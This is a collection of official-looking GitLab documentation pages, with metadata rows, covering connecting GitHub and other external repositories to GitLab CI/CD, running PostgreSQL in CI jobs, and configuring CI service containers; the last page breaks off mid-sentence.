Paste your personal access token and HTTPS repository URL into the form and select **Save**. 1. In GitLab, create a personal access token with `API` scope to authenticate the GitHub web hook notifying GitLab of new commits. 1. In GitHub, from **Settings > Webhooks**, create a web hook to notify GitLab of new commits. The web hook URL should be set to the GitLab API to [trigger pull mirroring](../../api/project_pull_mirroring.md#start-the-pull-mirroring-process-for-a-project), using the GitLab personal access token we just created: ```plaintext https://gitlab.com/api/v4/projects/<NAMESPACE>%2F<PROJECT>/mirror/pull?private_token=<PERSONAL_ACCESS_TOKEN> ``` Select the **Let me select individual events** option, then check the **Pull requests** and **Pushes** checkboxes. These settings are needed for [pipelines for external pull requests](_index.md#pipelines-for-external-pull-requests). 1. In GitHub, add a `.gitlab-ci.yml` to configure GitLab CI/CD.
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Using GitLab CI/CD with a GitHub repository breadcrumbs: - doc - ci - ci_cd_for_external_repos --- {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} GitLab CI/CD can be used with **GitHub.com** and **GitHub Enterprise** by creating a [CI/CD project](_index.md) to connect your GitHub repository to GitLab. <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> Watch a video on [Using GitLab CI/CD pipelines with GitHub repositories](https://www.youtube.com/watch?v=qgl3F2j-1cI). {{< alert type="note" >}} Because of [GitHub limitations](https://gitlab.com/gitlab-org/gitlab/-/issues/9147), [GitHub OAuth](../../integration/github.md#enable-github-oauth-in-gitlab) cannot be used to authenticate with GitHub as an external CI/CD repository. {{< /alert >}} ## Connect with personal access token Personal access tokens can only be used to connect GitHub.com repositories to GitLab, and the GitHub user must have the [owner role](https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github). To perform a one-off authorization with GitHub to grant GitLab access your repositories: 1. In GitHub, create a token: 1. Open <https://github.com/settings/tokens/new>. 1. Create a personal access token. 1. Enter a **Token description** and update the scope to allow `repo` and `admin:repo_hook` so that GitLab can access your project, update commit statuses, and create a web hook to notify GitLab of new commits. 1. In GitLab, create a project: 1. On the left sidebar, at the top, select **Create new** ({{< icon name="plus" >}}) and **New project/repository**. 1. Select **Run CI/CD for external repository**. 1. Select **GitHub**. 1. For **Personal access token**, paste the token. 1. Select **List Repositories**. 1. Select **Connect** to select the repository. 1. In GitHub, add a `.gitlab-ci.yml` to [configure GitLab CI/CD](../quick_start/_index.md). GitLab: 1. Imports the project. 1. Enables [pull mirroring](../../user/project/repository/mirror/pull.md). 1. Enables [GitHub project integration](../../user/project/integrations/github.md). 1. Creates a web hook on GitHub to notify GitLab of new commits. ## Connect manually To use **GitHub Enterprise** with **GitLab.com**, use this method. To manually enable GitLab CI/CD for your repository: 1. In GitHub, create a token: 1. Open <https://github.com/settings/tokens/new>. 1. Create a personal access token. 1. Enter a **Token description** and update the scope to allow `repo` so that GitLab can access your project and update commit statuses. 1. In GitLab, create a project: 1. On the left sidebar, at the top, select **Create new** ({{< icon name="plus" >}}) and **New project/repository**. 1. Select **Run CI/CD for external repository** and **Repository by URL**. 1. In the **Git repository URL** field, enter the HTTPS URL for your GitHub repository. If your project is private, use the personal access token you just created for authentication. 1. Fill in all the other fields and select **Create project**. GitLab automatically configures polling-based pull mirroring. 1. In GitLab, enable [GitHub project integration](../../user/project/integrations/github.md): 1. On the left sidebar, select **Settings > Integrations**. 1. Select the **Active** checkbox. 1. Paste your personal access token and HTTPS repository URL into the form and select **Save**. 1. In GitLab, create a personal access token with `API` scope to authenticate the GitHub web hook notifying GitLab of new commits. 1. In GitHub, from **Settings > Webhooks**, create a web hook to notify GitLab of new commits. The web hook URL should be set to the GitLab API to [trigger pull mirroring](../../api/project_pull_mirroring.md#start-the-pull-mirroring-process-for-a-project), using the GitLab personal access token we just created: ```plaintext https://gitlab.com/api/v4/projects/<NAMESPACE>%2F<PROJECT>/mirror/pull?private_token=<PERSONAL_ACCESS_TOKEN> ``` Select the **Let me select individual events** option, then check the **Pull requests** and **Pushes** checkboxes. These settings are needed for [pipelines for external pull requests](_index.md#pipelines-for-external-pull-requests). 1. In GitHub, add a `.gitlab-ci.yml` to configure GitLab CI/CD.
https://docs.gitlab.com/ci/ci_cd_for_external_repos
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/ci_cd_for_external_repos
[ "doc", "ci", "ci_cd_for_external_repos" ]
_index.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
GitLab CI/CD for external repositories
GitHub, Bitbucket, external sources, mirroring, and cross-platform.
{{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} GitLab CI/CD can be used with [GitHub](github_integration.md), [Bitbucket Cloud](bitbucket_integration.md), or any other Git server. Some [known issues](#known-issues) exist. Instead of moving your entire project to GitLab, you can connect your external repository to get the benefits of GitLab CI/CD. Connecting an external repository sets up [repository mirroring](../../user/project/repository/mirror/_index.md) and creates a lightweight project with issues, merge requests, wiki, and snippets disabled. These features [can be re-enabled later](../../user/project/settings/_index.md#configure-project-features-and-permissions). ## Connect to an external repository To connect to an external repository: 1. On the left sidebar, at the top, select **Create new** ({{< icon name="plus" >}}) and **New project/repository**. 1. Select **Run CI/CD for external repository**. 1. Select **GitHub** or **Repository by URL**. 1. Complete the fields. If the **Run CI/CD for external repository** option is not available: - The GitLab instance might not have any import sources configured. Ask an administrator to check the [import sources configuration](../../administration/settings/import_and_export_settings.md#configure-allowed-import-sources). - [Project mirroring](../../user/project/repository/mirror/_index.md) might be disabled. If disabled, only administrators can use the **Run CI/CD for external repository** option. Ask an administrator to check the [project mirroring configuration](../../administration/settings/visibility_and_access_controls.md#enable-project-mirroring). ## Pipelines for external pull requests When using GitLab CI/CD with an [external repository on GitHub](github_integration.md), it's possible to run a pipeline in the context of a Pull Request. When you push changes to a remote branch in GitHub, GitLab CI/CD can run a pipeline for the branch. However, when you open or update a Pull Request for that branch you may want to: - Run extra jobs. - Not run specific jobs. For example: ```yaml always-run: script: echo 'this should always run' on-pull-requests: script: echo 'this should run on pull requests' rules: - if: $CI_PIPELINE_SOURCE == "external_pull_request_event" except-pull-requests: script: echo 'This should not run for pull requests, but runs in other cases.' rules: - if: $CI_PIPELINE_SOURCE == "external_pull_request_event" when: never - when: on_success ``` ### Pipeline execution for external pull requests When a repository is imported from GitHub, GitLab subscribes to webhooks for `push` and `pull_request` events. Once a `pull_request` event is received, the Pull Request data is stored and kept as a reference. If the Pull Request has just been created, GitLab immediately creates a pipeline for the external pull request. If changes are pushed to the branch referenced by the Pull Request and the Pull Request is still open, a pipeline for the external pull request is created. GitLab CI/CD creates 2 pipelines in this case. One for the branch push and one for the external pull request. After the Pull Request is closed, no pipelines are created for the external pull request, even if new changes are pushed to the same branch. ### Additional predefined variables By using pipelines for external pull requests, GitLab exposes additional [predefined variables](../variables/predefined_variables.md) to the pipeline jobs. The variable names are prefixed with `CI_EXTERNAL_PULL_REQUEST_`. ### Known issues This feature does not support: - The [manual connection method](github_integration.md#connect-manually) required for GitHub Enterprise. If the integration is connected manually, external pull requests [do not trigger pipelines](https://gitlab.com/gitlab-org/gitlab/-/issues/323336#note_884820753). - Pull requests from fork repositories. [Pull Requests from fork repositories are ignored](https://gitlab.com/gitlab-org/gitlab/-/issues/5667). Given that GitLab creates 2 pipelines, if changes are pushed to a remote branch that references an open Pull Request, both contribute to the status of the Pull Request via GitHub integration. If you want to exclusively run pipelines on external pull requests and not on branches you can add `except: [branches]` to the job specs. [Read more](https://gitlab.com/gitlab-org/gitlab/-/issues/24089#workaround). ## Troubleshooting - [Pull mirroring is not triggering pipelines](../../user/project/repository/mirror/troubleshooting.md#pull-mirroring-is-not-triggering-pipelines). - [Fix hard failures when mirroring](../../user/project/repository/mirror/pull.md#fix-hard-failures-when-mirroring).
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: GitLab CI/CD for external repositories description: GitHub, Bitbucket, external sources, mirroring, and cross-platform. breadcrumbs: - doc - ci - ci_cd_for_external_repos --- {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} GitLab CI/CD can be used with [GitHub](github_integration.md), [Bitbucket Cloud](bitbucket_integration.md), or any other Git server. Some [known issues](#known-issues) exist. Instead of moving your entire project to GitLab, you can connect your external repository to get the benefits of GitLab CI/CD. Connecting an external repository sets up [repository mirroring](../../user/project/repository/mirror/_index.md) and creates a lightweight project with issues, merge requests, wiki, and snippets disabled. These features [can be re-enabled later](../../user/project/settings/_index.md#configure-project-features-and-permissions). ## Connect to an external repository To connect to an external repository: 1. On the left sidebar, at the top, select **Create new** ({{< icon name="plus" >}}) and **New project/repository**. 1. Select **Run CI/CD for external repository**. 1. Select **GitHub** or **Repository by URL**. 1. Complete the fields. If the **Run CI/CD for external repository** option is not available: - The GitLab instance might not have any import sources configured. Ask an administrator to check the [import sources configuration](../../administration/settings/import_and_export_settings.md#configure-allowed-import-sources). - [Project mirroring](../../user/project/repository/mirror/_index.md) might be disabled. If disabled, only administrators can use the **Run CI/CD for external repository** option. Ask an administrator to check the [project mirroring configuration](../../administration/settings/visibility_and_access_controls.md#enable-project-mirroring). ## Pipelines for external pull requests When using GitLab CI/CD with an [external repository on GitHub](github_integration.md), it's possible to run a pipeline in the context of a Pull Request. When you push changes to a remote branch in GitHub, GitLab CI/CD can run a pipeline for the branch. However, when you open or update a Pull Request for that branch you may want to: - Run extra jobs. - Not run specific jobs. For example: ```yaml always-run: script: echo 'this should always run' on-pull-requests: script: echo 'this should run on pull requests' rules: - if: $CI_PIPELINE_SOURCE == "external_pull_request_event" except-pull-requests: script: echo 'This should not run for pull requests, but runs in other cases.' rules: - if: $CI_PIPELINE_SOURCE == "external_pull_request_event" when: never - when: on_success ``` ### Pipeline execution for external pull requests When a repository is imported from GitHub, GitLab subscribes to webhooks for `push` and `pull_request` events. Once a `pull_request` event is received, the Pull Request data is stored and kept as a reference. If the Pull Request has just been created, GitLab immediately creates a pipeline for the external pull request. If changes are pushed to the branch referenced by the Pull Request and the Pull Request is still open, a pipeline for the external pull request is created. GitLab CI/CD creates 2 pipelines in this case. One for the branch push and one for the external pull request. After the Pull Request is closed, no pipelines are created for the external pull request, even if new changes are pushed to the same branch. ### Additional predefined variables By using pipelines for external pull requests, GitLab exposes additional [predefined variables](../variables/predefined_variables.md) to the pipeline jobs. The variable names are prefixed with `CI_EXTERNAL_PULL_REQUEST_`. ### Known issues This feature does not support: - The [manual connection method](github_integration.md#connect-manually) required for GitHub Enterprise. If the integration is connected manually, external pull requests [do not trigger pipelines](https://gitlab.com/gitlab-org/gitlab/-/issues/323336#note_884820753). - Pull requests from fork repositories. [Pull Requests from fork repositories are ignored](https://gitlab.com/gitlab-org/gitlab/-/issues/5667). Given that GitLab creates 2 pipelines, if changes are pushed to a remote branch that references an open Pull Request, both contribute to the status of the Pull Request via GitHub integration. If you want to exclusively run pipelines on external pull requests and not on branches you can add `except: [branches]` to the job specs. [Read more](https://gitlab.com/gitlab-org/gitlab/-/issues/24089#workaround). ## Troubleshooting - [Pull mirroring is not triggering pipelines](../../user/project/repository/mirror/troubleshooting.md#pull-mirroring-is-not-triggering-pipelines). - [Fix hard failures when mirroring](../../user/project/repository/mirror/pull.md#fix-hard-failures-when-mirroring).
https://docs.gitlab.com/ci/postgres
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/postgres.md
2025-08-13
doc/ci/services
[ "doc", "ci", "services" ]
postgres.md
Verify
Runner
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Using PostgreSQL
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} As many applications depend on PostgreSQL as their database, you have to use it to run your tests. ## Use PostgreSQL with the Docker executor To pass variables set in the GitLab UI to service containers, you must [define the variables](../variables/_index.md#define-a-cicd-variable-in-the-ui). You must define your variables as either Group or Project, then call the variables in your job as shown in the following workaround. Postgres 15.4 and later versions do not substitute schemas or owner names into extension scripts if they include quote ("), backslash (\), or dollar sign ($) symbols. If the CI variables are not configured, the value uses the environment variable name as a string instead. For example, `POSTGRES_USER: $USER` results in the `POSTGRES_USER` variable being set to '$USER', which causes Postgres to show the following error: ```shell Fatal: invalid character in extension ``` The workaround is to set your variables in [GitLab CI/CD variables](../variables/_index.md) or set variables in string form: 1. [Set Postgres variables in GitLab](../variables/_index.md#for-a-project). Variables set in the GitLab UI are not passed down to the service containers. 1. In the `.gitlab-ci.yml` file, specify a Postgres image: ```yaml default: services: - postgres ``` 1. In the `.gitlab-ci.yml` file, add your defined variables: ```yaml variables: POSTGRES_DB: $POSTGRES_DB POSTGRES_USER: $POSTGRES_USER POSTGRES_PASSWORD: $POSTGRES_PASSWORD POSTGRES_HOST_AUTH_METHOD: trust ``` For more information about using `postgres` for the `Host`, see [How services are linked to the job](_index.md#how-services-are-linked-to-the-job). 1. Configure your application to use the database, for example: ```yaml Host: postgres User: $POSTGRES_USER Password: $POSTGRES_PASSWORD Database: $POSTGRES_DB ``` Alternatively, you can set variables as a string in the `.gitlab-ci.yml` file: ```yaml variables: POSTGRES_DB: DB_name POSTGRES_USER: username POSTGRES_PASSWORD: password POSTGRES_HOST_AUTH_METHOD: trust ``` You can use any other Docker image available on [Docker Hub](https://hub.docker.com/_/postgres). For example, to use PostgreSQL 14.3, the service becomes `postgres:14.3`. The `postgres` image can accept some environment variables. For more details, see the documentation on [Docker Hub](https://hub.docker.com/_/postgres). ## Use PostgreSQL with the Shell executor You can also use PostgreSQL on manually configured servers that are using GitLab Runner with the Shell executor. First install the PostgreSQL server: ```shell sudo apt-get install -y postgresql postgresql-client libpq-dev ``` The next step is to create a user, so sign in to PostgreSQL: ```shell sudo -u postgres psql -d template1 ``` Then create a user (in our case `runner`) which is used by your application. Change `$password` in the following command to a strong password. {{< alert type="note" >}} Be sure to not enter `template1=#` in the following commands, as that's part of the PostgreSQL prompt. {{< /alert >}} ```shell template1=# CREATE USER runner WITH PASSWORD '$password' CREATEDB; ``` The created user has the privilege to create databases (`CREATEDB`). The following steps describe how to create a database explicitly for that user. Privileges allow your testing framework to create and drop databases as needed. Create the database and grant all privileges to it for the user `runner`: ```shell template1=# CREATE DATABASE nice_marmot OWNER runner; ``` If all went well, you can now quit the database session: ```shell template1=# \q ``` Now, try to connect to the newly created database with the user `runner` to check that everything is in place. ```shell psql -U runner -h localhost -d nice_marmot -W ``` This command explicitly directs `psql` to connect to localhost to use the md5 authentication. If you omit this step, you are denied access. Finally, configure your application to use the database, for example: ```yaml Host: localhost User: runner Password: $password Database: nice_marmot ``` ## Example project We have set up an [Example PostgreSQL Project](https://gitlab.com/gitlab-examples/postgres) for your convenience that runs on [GitLab.com](https://gitlab.com) using our publicly available [instance runners](../runners/_index.md). Want to hack on it? Fork it, commit, and push your changes. In a few moments, the changes are picked by a public runner and the job begins.
--- stage: Verify group: Runner info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Using PostgreSQL breadcrumbs: - doc - ci - services --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} As many applications depend on PostgreSQL as their database, you have to use it to run your tests. ## Use PostgreSQL with the Docker executor To pass variables set in the GitLab UI to service containers, you must [define the variables](../variables/_index.md#define-a-cicd-variable-in-the-ui). You must define your variables as either Group or Project, then call the variables in your job as shown in the following workaround. Postgres 15.4 and later versions do not substitute schemas or owner names into extension scripts if they include quote ("), backslash (\), or dollar sign ($) symbols. If the CI variables are not configured, the value uses the environment variable name as a string instead. For example, `POSTGRES_USER: $USER` results in the `POSTGRES_USER` variable being set to '$USER', which causes Postgres to show the following error: ```shell Fatal: invalid character in extension ``` The workaround is to set your variables in [GitLab CI/CD variables](../variables/_index.md) or set variables in string form: 1. [Set Postgres variables in GitLab](../variables/_index.md#for-a-project). Variables set in the GitLab UI are not passed down to the service containers. 1. In the `.gitlab-ci.yml` file, specify a Postgres image: ```yaml default: services: - postgres ``` 1. In the `.gitlab-ci.yml` file, add your defined variables: ```yaml variables: POSTGRES_DB: $POSTGRES_DB POSTGRES_USER: $POSTGRES_USER POSTGRES_PASSWORD: $POSTGRES_PASSWORD POSTGRES_HOST_AUTH_METHOD: trust ``` For more information about using `postgres` for the `Host`, see [How services are linked to the job](_index.md#how-services-are-linked-to-the-job). 1. Configure your application to use the database, for example: ```yaml Host: postgres User: $POSTGRES_USER Password: $POSTGRES_PASSWORD Database: $POSTGRES_DB ``` Alternatively, you can set variables as a string in the `.gitlab-ci.yml` file: ```yaml variables: POSTGRES_DB: DB_name POSTGRES_USER: username POSTGRES_PASSWORD: password POSTGRES_HOST_AUTH_METHOD: trust ``` You can use any other Docker image available on [Docker Hub](https://hub.docker.com/_/postgres). For example, to use PostgreSQL 14.3, the service becomes `postgres:14.3`. The `postgres` image can accept some environment variables. For more details, see the documentation on [Docker Hub](https://hub.docker.com/_/postgres). ## Use PostgreSQL with the Shell executor You can also use PostgreSQL on manually configured servers that are using GitLab Runner with the Shell executor. First install the PostgreSQL server: ```shell sudo apt-get install -y postgresql postgresql-client libpq-dev ``` The next step is to create a user, so sign in to PostgreSQL: ```shell sudo -u postgres psql -d template1 ``` Then create a user (in our case `runner`) which is used by your application. Change `$password` in the following command to a strong password. {{< alert type="note" >}} Be sure to not enter `template1=#` in the following commands, as that's part of the PostgreSQL prompt. {{< /alert >}} ```shell template1=# CREATE USER runner WITH PASSWORD '$password' CREATEDB; ``` The created user has the privilege to create databases (`CREATEDB`). The following steps describe how to create a database explicitly for that user. Privileges allow your testing framework to create and drop databases as needed. Create the database and grant all privileges to it for the user `runner`: ```shell template1=# CREATE DATABASE nice_marmot OWNER runner; ``` If all went well, you can now quit the database session: ```shell template1=# \q ``` Now, try to connect to the newly created database with the user `runner` to check that everything is in place. ```shell psql -U runner -h localhost -d nice_marmot -W ``` This command explicitly directs `psql` to connect to localhost to use the md5 authentication. If you omit this step, you are denied access. Finally, configure your application to use the database, for example: ```yaml Host: localhost User: runner Password: $password Database: nice_marmot ``` ## Example project We have set up an [Example PostgreSQL Project](https://gitlab.com/gitlab-examples/postgres) for your convenience that runs on [GitLab.com](https://gitlab.com) using our publicly available [instance runners](../runners/_index.md). Want to hack on it? Fork it, commit, and push your changes. In a few moments, the changes are picked by a public runner and the job begins.
https://docs.gitlab.com/ci/services
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/services
[ "doc", "ci", "services" ]
_index.md
Verify
Runner
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Services
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} When you configure CI/CD, you specify an image, which is used to create the container where your jobs run. To specify this image, you use the `image` keyword. You can specify an additional image by using the `services` keyword. This additional image is used to create another container, which is available to the first container. The two containers have access to one another and can communicate when running the job. The service image can run any application, but the most common use case is to run a database container, for example: - [MySQL](mysql.md) - [PostgreSQL](postgres.md) - [Redis](redis.md) - [GitLab](gitlab.md) as an example for a microservice offering a JSON API Consider that you're developing a content management system that uses database for storage. You need a database to test all features in the application. Running a database container as a service image is a good use case in this scenario. Use an existing image and run it as an additional container instead of installing `mysql` every time you build a project. You're not limited to only database services. You can add as many services you need to `.gitlab-ci.yml` or manually modify the [`config.toml`](https://docs.gitlab.com/runner/configuration/advanced-configuration.html). Any image found at [Docker Hub](https://hub.docker.com/) or your private container registry can be used as a service. For information about using private images, see [Access an image from a private container registry](../docker/using_docker_images.md#access-an-image-from-a-private-container-registry). Services inherit the same DNS servers, search domains, and additional hosts as the CI container itself. ## How services are linked to the job To better understand how container linking works, read [Linking containers together](https://docs.docker.com/network/links/). If you add `mysql` as service to your application, the image is used to create a container that's linked to the job container. The service container for MySQL is accessible under the hostname `mysql`. To access your database service, connect to the host named `mysql` instead of a socket or `localhost`. Read more in [accessing the services](#accessing-the-services). ## How the health check of services works Services are designed to provide additional features which are **network accessible**. They may be a database like MySQL, or Redis, and even `docker:dind` which allows you to use Docker-in-Docker (DinD). It can be practically anything that's required for the CI/CD job to proceed, and is accessed by network. To make sure this works, the runner: 1. Checks which ports are exposed from the container by default. 1. Starts a special container that waits for these ports to be accessible. If the second stage of the check fails, it prints the warning: `*** WARNING: Service XYZ probably didn't start properly`. This issue can occur because: - There is no opened port in the service. - The service was not started properly before the timeout, and the port is not responding. In most cases it affects the job, but there may be situations when the job still succeeds even if that warning was printed. For example: - The service was started shortly after the warning was raised, and the job is not using the linked service from the beginning. In that case, when the job needed to access the service, it may have been already there waiting for connections. - The service container is not providing any networking service, but it's doing something with the job's directory (all services have the job directory mounted as a volume under `/builds`). In that case, the service does its job, and because the job is not trying to connect to it, it does not fail. If the services start successfully, they start before the [`before_script`](../yaml/_index.md#before_script) runs. This means you can write a `before_script` that queries the service. Services stop at the end of the job, even if the job fails. ## Using software provided by a service image When you specify the `service`, this provides **network accessible** services. A database is the simplest example of such a service. The services feature does not add any software from the defined `services` images to the job's container. For example, if you have the following `services` defined in your job, the `php`, `node` or `go` commands are **not** available for your script, and the job fails: ```yaml job: services: - php:7 - node:latest - golang:1.10 image: alpine:3.7 script: - php -v - node -v - go version ``` If you need to have `php`, `node` and `go` available for your script, you should either: - Choose an existing Docker image that contains all required tools. - Create your own Docker image, with all the required tools included, and use that in your job. ## Define `services` in the `.gitlab-ci.yml` file It's also possible to define different images and services per job: ```yaml default: before_script: - bundle install test:2.6: image: ruby:2.6 services: - postgres:11.7 script: - bundle exec rake spec test:2.7: image: ruby:2.7 services: - postgres:12.2 script: - bundle exec rake spec ``` Or you can pass some [extended configuration options](../docker/using_docker_images.md#extended-docker-configuration-options) for `image` and `services`: ```yaml default: image: name: ruby:2.6 entrypoint: ["/bin/bash"] services: - name: my-postgres:11.7 alias: db,postgres,pg entrypoint: ["/usr/local/bin/db-postgres"] command: ["start"] before_script: - bundle install test: script: - bundle exec rake spec ``` ## Accessing the services If you need a Wordpress instance to test API integration with your application, you can use the [`tutum/wordpress`](https://hub.docker.com/r/tutum/wordpress/) image in your `.gitlab-ci.yml` file: ```yaml services: - tutum/wordpress:latest ``` If you don't [specify a service alias](#available-settings-for-services), when the job runs, `tutum/wordpress` is started. You have access to it from your build container under two hostnames: - `tutum-wordpress` - `tutum__wordpress` Hostnames with underscores are not RFC valid and may cause problems in third-party applications. The default aliases for the service's hostname are created from its image name following these rules: - Everything after the colon (`:`) is stripped. - Slash (`/`) is replaced with double underscores (`__`) and the primary alias is created. - Slash (`/`) is replaced with a single dash (`-`) and the secondary alias is created. To override the default behavior, you can [specify one or more service aliases](#available-settings-for-services). ### Connecting services You can use inter-dependent services with complex jobs, like end-to-end tests where an external API needs to communicate with its own database. For example, for an end-to-end test for a front-end application that uses an API, and where the API needs a database: ```yaml end-to-end-tests: image: node:latest services: - name: selenium/standalone-firefox:${FIREFOX_VERSION} alias: firefox - name: registry.gitlab.com/organization/private-api:latest alias: backend-api - name: postgres:14.3 alias: db postgres db variables: FF_NETWORK_PER_BUILD: 1 POSTGRES_PASSWORD: supersecretpassword BACKEND_POSTGRES_HOST: postgres script: - npm install - npm test ``` For this solution to work, you must use [the networking mode that creates a new network for each job](https://docs.gitlab.com/runner/executors/docker.html#create-a-network-for-each-job). ## Passing CI/CD variables to services You can also pass custom CI/CD [variables](../variables/_index.md) to fine tune your Docker `images` and `services` directly in the `.gitlab-ci.yml` file. For more information, read about [`.gitlab-ci.yml` defined variables](../variables/_index.md#define-a-cicd-variable-in-the-gitlab-ciyml-file). ```yaml # The following variables are automatically passed down to the Postgres container # as well as the Ruby container and available within each. variables: HTTPS_PROXY: "https://10.1.1.1:8090" HTTP_PROXY: "https://10.1.1.1:8090" POSTGRES_DB: "my_custom_db" POSTGRES_USER: "postgres" POSTGRES_PASSWORD: "example" PGDATA: "/var/lib/postgresql/data" POSTGRES_INITDB_ARGS: "--encoding=UTF8 --data-checksums" default: services: - name: postgres:11.7 alias: db entrypoint: ["docker-entrypoint.sh"] command: ["postgres"] image: name: ruby:2.6 entrypoint: ["/bin/bash"] before_script: - bundle install test: script: - bundle exec rake spec ``` ## Available settings for `services` | Setting | Required | GitLab version | Description | | ------------- | ------------------------------------ | -------------- | ----------- | | `name` | yes, when used with any other option | 9.4 | Full name of the image to use. If the full image name includes a registry hostname, use the `alias` option to define a shorter service access name. For more information, see [Accessing the services](#accessing-the-services). | | `entrypoint` | no | 9.4 | Command or script to execute as the container's entrypoint. It's translated to the Docker `--entrypoint` option while creating the container. The syntax is similar to [`Dockerfile`'s `ENTRYPOINT`](https://docs.docker.com/reference/dockerfile/#entrypoint) directive, where each shell token is a separate string in the array. | | `command` | no | 9.4 | Command or script that should be used as the container's command. It's translated to arguments passed to Docker after the image's name. The syntax is similar to [`Dockerfile`'s `CMD`](https://docs.docker.com/reference/dockerfile/#cmd) directive, where each shell token is a separate string in the array. | | `alias` | no | 9.4 | Additional aliases to access the service from the job's container. Multiple aliases can be separated by spaces or commas. For more information, see [Accessing the services](#accessing-the-services). Using alias as a container name for the Kubernetes executor was [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/421131) in GitLab Runner 17.9. For more information, see [Configuring the service containers name with the Kubernetes executor](#using-aliases-as-service-container-names-for-the-kubernetes-executor). | | `variables` | no | 14.5 | Additional environment variables that are passed exclusively to the service. The syntax is the same as [Job Variables](../variables/_index.md). Service variables cannot reference themselves. | | `pull_policy` | no | 15.1 | Specify how the runner pulls Docker images when it executes a job. Valid values are `always`, `if-not-present`, and `never`. Default is `always`. For more information, see [services:pull_policy](../yaml/_index.md#servicespull_policy). | ## Starting multiple services from the same image Before the new extended Docker configuration options, the following configuration would not work properly: ```yaml services: - mysql:latest - mysql:latest ``` The runner would start two containers, each that uses the `mysql:latest` image. However, both of them would be added to the job's container with the `mysql` alias, based on the [default hostname naming](#accessing-the-services). This would end with one of the services not being accessible. After the new extended Docker configuration options, the previous example would look like this: ```yaml services: - name: mysql:latest alias: mysql-1 - name: mysql:latest alias: mysql-2 ``` The runner still starts two containers using the `mysql:latest` image, however now each of them are also accessible with the alias configured in `.gitlab-ci.yml` file. ## Setting a command for the service Let's assume you have a `super/sql:latest` image with some SQL database in it. You would like to use it as a service for your job. Let's also assume that this image does not start the database process while starting the container. The user needs to manually use `/usr/bin/super-sql run` as a command to start the database. Before the new extended Docker configuration options, you would need to: - Create your own image based on the `super/sql:latest` image. - Add the default command. - Use the image in the job's configuration. - `my-super-sql:latest` image's Dockerfile: ```dockerfile FROM super/sql:latest CMD ["/usr/bin/super-sql", "run"] ``` - In the job in the `.gitlab-ci.yml`: ```yaml services: - my-super-sql:latest ``` After the new extended Docker configuration options, you can set a `command` in the `.gitlab-ci.yml` file instead: ```yaml services: - name: super/sql:latest command: ["/usr/bin/super-sql", "run"] ``` The syntax of `command` is similar to [Dockerfile `CMD`](https://docs.docker.com/reference/dockerfile/#cmd). ## Using aliases as service container names for the Kubernetes executor {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/421131) in GitLab and GitLab Runner 17.9. {{< /history >}} You can use service aliases as service container names for the Kubernetes executor. GitLab Runner names containers based on the following conditions: - When multiple aliases are set for a service, the service container is named after the first alias that: - Isn't already used by another service container. - Follows the [Kubernetes constraints for label names](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names). - When aliases can't be used to name a service container, GitLab Runner falls back to the `svc-i` pattern. The following examples illustrate how aliases are used to name service containers for the Kubernetes executor. ### One alias per services In the following `.gitlab-ci.yml` file: ```yaml job: image: alpine:latest script: - sleep 10 services: - name: alpine:latest alias: alpine - name: mysql:latest alias: mysql ``` The system creates job Pod with containers named `alpine` and `mysql` in addition to the standard `build` and `helper` containers. These aliases are used because they: - Are not used by another service container. - Follow the [Kubernetes constraints for label names](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names). However, in the following `.gitlab-ci.yml`: ```yaml job: image: alpine:latest script: - sleep 10 services: - name: mysql:lts alias: mysql - name: mysql:latest alias: mysql ``` The system creates two more containers named `mysql` and `svc-0` in addition to the `build` and `helper` containers. The `mysql` container corresponds to the `mysql:lts` image, while the `svc-0` container corresponds to the `mysql:latest` image. ### Multiple aliases per services In the following `.gitlab-ci.yml` file: ```yaml job: image: alpine:latest script: - sleep 10 services: - name: alpine:latest alias: alpine,alpine-latest - name: alpine:edge alias: alpine,alpine-edge,alpine-latest ``` The system creates four more containers in addition to the `build` and `helper` containers: - `alpine` which should correspond to the container with the `alpine:latest` image. - `alpine-edge` which should correspond to the container with the `alpine:edge` image (`alpine` alias being already used for the previous container). In this example, the alias `alpine-latest` is not being used. However, in the following `.gitlab-ci.yml`: ```yaml job: image: alpine:latest script: - sleep 10 services: - name: alpine:latest alias: alpine,alpine-edge - name: alpine:edge alias: alpine,alpine-edge - name: alpine:3.21 alias: alpine,alpine-edge ``` In addition to the `build` and `helper` containers, six more containers are created. - `alpine` should refer to the container with the `alpine:latest` image. - `alpine-edge` should refer to the container with the `alpine:edge` image (`alpine` alias being already used for the previous container). - `svc-0` should refer to the container with the `alpine:3.21` image (`alpine` and `alpine-edge` aliases being already used for the previous containers). - The `i` in the 